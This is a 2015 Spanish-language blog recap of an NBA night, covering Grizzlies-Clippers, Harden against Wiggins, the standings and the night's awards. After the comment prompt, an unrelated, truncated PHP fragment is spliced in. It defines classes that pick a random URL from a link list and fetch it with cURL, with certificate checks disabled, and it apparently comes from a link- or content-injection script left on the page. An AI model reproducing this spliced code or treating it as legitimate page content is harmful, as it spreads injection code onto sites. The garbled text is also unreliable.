La Crónica: Grit and Win

24 de February de 2015 por txusma

Grizzlies y Clippers ofrecieron anoche una nueva edición de su particular baile, uno en el que se danza al ritmo que marcan los de Memphis pero que casi siempre ofrece finales apasionantes. No fue la excepción anoche. También prestamos atención a Andrew Wiggins, capaz de alzarse para mirar cara a cara a todo un James Harden. Los Pelicans, Goran Dragic y Lauvergne son otros de los protagonistas de la jornada que os narramos a continuación.

grizzlac

Memphis Grizzlies 90 – L.A. Clippers 87

Los duelos entre Grizzlies y Clippers se han convertido en todo un clásico moderno, una cita ineludible para los aficionados a la NBA, especialmente aquellos que gusten de duelos intensos, en los que traspira que entre ambos equipos hay deudas pendientes. La ausencia de Blake Griffin no cambio el guion habitual de estas últimas temporadas: la igualdad predominó durante los 48 minutos y al final decidieron los detalles. Esta vez fue un robo de Mike Conley a Chris Paul a menos de 2 segundos para la conclusión lo que certificó la victoria de los Grizzlies, que de nuevo lograron que el partido se jugase en los parámetros que más les favorecen y acumulan un espectacular balance de 15-3 desde la incorporación de Jeff Green. Están a tres partidos de los Warriors y todo parece posible ahora mismo.

Minnesota Timberwolves 102 – Houston Rockets 113

Pocos jugadores hay capaces de fallar sus 7 primeros tiros en un partido para acabar el mismo con 30 puntos, un triple doble y la certeza de haber conducido a los suyos a una nueva victoria. Uno de esos pocos elegidos es James Harden. Ante unos Wolves competitivos, con Wiggins dando más razones para la ilusión a los aficionados de Minnesota, a Harden le costó arrancar. Poco a poco, a partir de su versión más polivalente, fue calentando, y al final del tercer cuarto, su brutal crossover ante Ricky Rubio confirmó que ya teníamos ante nosotros al Harden MVP. Wiggins lideró una nueva carga de los Wolves en el último cuarto y llegó a situar la diferencia en un solo punto, pero Harden y los Rockets reaccionaron a tiempo para sellar la victoria.

El resto de la jornada

San Antonio lleva 3 derrotas consecutivas que coinciden con el conocido “Rodeo Road Trip”. Estos días se celebra una importante competición de rodeo en el AT&T Center que obliga a los tejanos a jugar 9 partidos consecutivos fuera de casa. De estos ya han perdido 4, el último ante los Jazz de Rudy Gobert que han conseguido dos victorias consecutivas en casa ante Blazers y Spurs, nada menos. De todas maneras es muy difícil que los Spurs puedan verse en problemas pero no sería descabellado que cayeran hasta la 8ª plaza que ahora ocupan los Thunder. Por detrás, los Pelicans se sobrepusieron a todas sus bajas (Davis, Holiday, Anderson…) y se impusieron a unos Raptors que tienen ya a Bulls (ganadores anoche ante los Bucks en un partido feo, feo) y Cavs pisándoles los talones. Los Suns, en cambio, cayeron claramente en casa ante unos Celtics que aún sueñan con la postemporada a pesar de la baja de Sullinger. Los dos equipos que ocupan los últimas plazas de PO del Este, Miami y Brooklyn, ganaron. Los primeros, a los Sixers gracias a la primera exhibición de Goran Dragic, y los segundos, a domicilio a unos Nuggets en los que debutó el francés Joffrey Lauvergne.

PREMIOS

MVP: James Harden consiguió su 2º triple doble de la temporada con 31 puntos, 11 rebotes y 10 asistencias y aún tuvo tiempo de servir 4 buenos pinchos de merluza. Poquito a poquito se está haciendo un hueco en la historia de los Houston Rockets.

Rookie: 30 puntos nada menos anotó Andrew Wiggins. El problema es que enfrente tenía a todo un candidato al MVP como Harden. Las bajas de Jarrett Jack y Bojan Bogdanovic otorgaron la titularidad en los Nets a Markel Brown. El ex compañero de Marcus Smart en Oklahoma State acabó con 10 puntos, 11 rebotes, 2 asistencias, 2 robos y 4 tapones en 45 minutos.

Sorpresa: Los Pelicans ganaron a pesar de todas las bajas que arrastran y buena parte de culpa la tuvo Luke Babbit que acabó el partido con 18 puntos y 8 rebotes. Los Suns han dejado claro que se la van a jugar con Alex Len, una confianza que el ucraniano se ha ganado con partidos como el de ayer: 10 puntos, 12 rebotes y 6 tapones.

Decepción: Tristísimo partido de Tony Parker en Utah. El francés sólo fue capaz de anotar 5 puntos y perdió 4 balones. Por su parte, Derrick Rose anotó 8 puntos pero sólo acertó 1 de sus 13 intentos a canasta.

Esfuerzo en vano: Los Clippers cayeron en un partido a cara de perro contra unos auténticos especialistas como son los Grizzlies pero no sería porque Chris Paul no aportara todo lo que tenía. Finalizó el partido con 30 puntos, 10 asistencias, 4 rebotes, 2 robos y 2 tapones.

TOP-10

Imágenes | AP Photos / Getty Images

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>